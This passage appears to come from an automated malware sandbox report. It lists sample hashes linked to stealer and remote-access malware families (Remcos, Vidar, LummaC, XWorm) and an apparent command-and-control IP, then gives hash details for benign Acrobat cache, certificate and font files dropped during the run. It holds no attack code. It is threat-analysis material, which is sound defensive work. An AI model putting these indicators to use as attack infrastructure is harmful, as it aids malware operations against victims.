3b5074b1b5d032e5620f69f9f700ff0e | pPLwX9wSrD.exe | malicious | Remcos | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | 510005940.docx.doc | malicious | Unknown | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | update.js | malicious | Unknown | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Unknown | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Unknown | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | yiDQb6GkBq.exe | malicious | Amadey, LummaC Stealer, Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | jN6irWtNiG.lnk | malicious | Unknown | 193.26.115.21
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | FwR7as4xUq.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | InsertSr.exe | malicious | GO Backdoor
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | vqMMwqCFZQ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | eddzD2MA12.exe | malicious | Stealc, Vidar
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | FwR7as4xUq.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | InsertSr.exe | malicious | GO Backdoor
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | vqMMwqCFZQ.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | eddzD2MA12.exe | malicious | Stealc, Vidar
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.184430484266841
                                                                          Encrypted:false
                                                                          SSDEEP:6:75WwOq2PCHhJ2nKuAl9OmbnIFUt8O5Ww/Zmw+O5WwtkwOCHhJ2nKuAl9OmbjLJ:7I7vBHAahFUt8OI6/+OIG56HAaSJ
                                                                          MD5:A4F974261C96F1B67EAC94907141E236
                                                                          SHA1:2499ECFBD5288A0C7754DBB0FB145A261F8AA739
                                                                          SHA-256:5198F21B163F32D2DC19C9B671814180BC3515DF937403393C4D42E42FCDF79F
                                                                          SHA-512:FE22A23849CECDF243ACAF0B9FA055F1E65EB258366CB413AC92B78A6A0A0613CFEB66174E8A943F7B9B08B833E294CB9D1FDF99C4F9FB832DE0958DE7608B56
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.729 ad4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/12-13:07:14.732 ad4 Recovering log #3.2024/12/12-13:07:14.732 ad4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):338
                                                                          Entropy (8bit):5.152390589505568
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww2mAVq2PCHhJ2nKuAl9Ombzo2jMGIFUt8O5WwoZAgZmw+O5WwoZAIkwOCHhJV:7IzvBHAa8uFUt8OIbz/+OIbp56HAa8RJ
                                                                          MD5:411177BD747D28AA62D4B18F6DFCCFE9
                                                                          SHA1:F36A32407296DE851A493B241CAD395F0405D003
                                                                          SHA-256:5B952A9542F8DB96F8A837F511F88729BB5264CF7A6C183F3189A0172DA35603
                                                                          SHA-512:BCCC0EFA69F7E444DC29965471A07C5FF1AD15E8FCD11B09C054BE6749886A0C6DA51C3F6630693CF2E4150E9A3BB118FE47A583AC7F747F85CCCEDAACEA0C29
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.817 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/12-13:07:14.818 1440 Recovering log #3.2024/12/12-13:07:14.818 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.9581609957270265
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqAfsBdOg2HfAcaq3QYiub6P7E4TX:Y2sRds9gdMHfr3QYhbS7n7
                                                                          MD5:274E2ABFB248198F79DEB4D4213264A3
                                                                          SHA1:6F88DD9B707E9EDF48273BA9BA486D0D6F18827D
                                                                          SHA-256:E799C8D22842387ECC22AD5BC990CA655CAF17FD3E55FDF630DD9079474075F3
                                                                          SHA-512:FAF3122DAE67BB9618F47ADABFAB93CF9AB5C0C22512C63A7ACD3C665B9116E655CD62A0504A6C52E15DCBD8E502E9AF2172C56F9524BF853569E4E0D520096D
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378586843213965","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":916321},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3878
                                                                          Entropy (8bit):5.232243335145852
                                                                          Encrypted:false
                                                                          SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bw/j5ap:S43C4mS7fFi0KFYDjr3LWO3V3aw+bw/6
                                                                          MD5:9DC7FD6E6D5E6B0A16230922E55D20EE
                                                                          SHA1:351342A16812AB312E54A7CD2E4069C91452E81E
                                                                          SHA-256:CB99023B3D0DA1D1144FC3A30A3A133F3C86AAD738957B60672E6986320D72C2
                                                                          SHA-512:CEC3FE92F719617AAB2ECC0B21C01F748F70A97C16017DEFF933BE0EE20E4DFFD47AABAA98A5596102A7C4021FF542B18891BF9A148612D3A2F7F2C348CB06C1
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):5.180616724102491
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww1AVq2PCHhJ2nKuAl9OmbzNMxIFUt8O5WwL4AgZmw+O5WwJvAIkwOCHhJ2nKA:7INvBHAa8jFUt8OIZ/+OII56HAa84J
                                                                          MD5:BFDC9F343918A4B37A0FD0F07666403F
                                                                          SHA1:34170AE0AD212E5C6D632B396703757FE6028278
                                                                          SHA-256:2401046E2FF55220FAE5BFBEEE6DCB1FD3B45AD5AFAFC93C1C99E2224049F75E
                                                                          SHA-512:7E82DA3A5702A5798F0733B07D22DA77128C86108C9F45905B6EF4E9EC4628E5EF64081192B21C8B75A8428446FACF282FB7AD050456A32BB312CD62CFE465EA
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.969 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/12-13:07:14.971 1440 Recovering log #3.2024/12/12-13:07:14.972 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):5.180616724102491
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww1AVq2PCHhJ2nKuAl9OmbzNMxIFUt8O5WwL4AgZmw+O5WwJvAIkwOCHhJ2nKA:7INvBHAa8jFUt8OIZ/+OII56HAa84J
                                                                          MD5:BFDC9F343918A4B37A0FD0F07666403F
                                                                          SHA1:34170AE0AD212E5C6D632B396703757FE6028278
                                                                          SHA-256:2401046E2FF55220FAE5BFBEEE6DCB1FD3B45AD5AFAFC93C1C99E2224049F75E
                                                                          SHA-512:7E82DA3A5702A5798F0733B07D22DA77128C86108C9F45905B6EF4E9EC4628E5EF64081192B21C8B75A8428446FACF282FB7AD050456A32BB312CD62CFE465EA
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.969 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/12-13:07:14.971 1440 Recovering log #3.2024/12/12-13:07:14.972 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):71954
                                                                          Entropy (8bit):7.996617769952133
                                                                          Encrypted:true
                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                          Malicious:false
                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.7529698674325394
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkllb6RltfllXlE/HT8k/1NNX8RolJuRdxLlGB9lQRYwpDdt:kKVleT84NMa8RdWBwRd
                                                                          MD5:35AD8371543C4767B8B632DAA7F8EC17
                                                                          SHA1:E423DD50E454013AB78A55E59745E7E4502AFFA8
                                                                          SHA-256:81012B96E16D17414F5F2ECA6C46BC4D8A8C9BBB1CAB31E23650FDF6E5505F20
                                                                          SHA-512:B7CB025C99A165037F71AB106B98C79C20F9F92B0811159D80B9D7033EFBC47B83850189EBBF26EAA12203E13CF2C3A75F4E98EA3ECA2EC72DB32A0FED4286D2
                                                                          Malicious:false
                                                                          Preview:p...... ........V>2..L..(....................................................... ..........W....4R..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.137556996908955
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKXLllL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ODnLNkPlE99SNxAhUe/3
                                                                          MD5:360CC3F86FCA430E8DE6D1466045C094
                                                                          SHA1:F516771EFD74A9D57326E7776BE54427A612E25A
                                                                          SHA-256:502A41450F8EFA10F207774228D92A85ED1DA80F5E8418C0588B143B87C6715D
                                                                          SHA-512:F9FD22508DC3EF1A5219B77EB83D8DD203D3FA9D7920C5757DCE3495AD4095E0172E86869C24CEC88BF771BA9A0897697CA82DD955E6A3F6C411C9E26E2CF40F
                                                                          Malicious:false
                                                                          Preview:p...... ..........o..L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):10880
                                                                          Entropy (8bit):5.214360287289079
                                                                          Encrypted:false
                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):10880
                                                                          Entropy (8bit):5.214360287289079
                                                                          Encrypted:false
                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                          Malicious:false
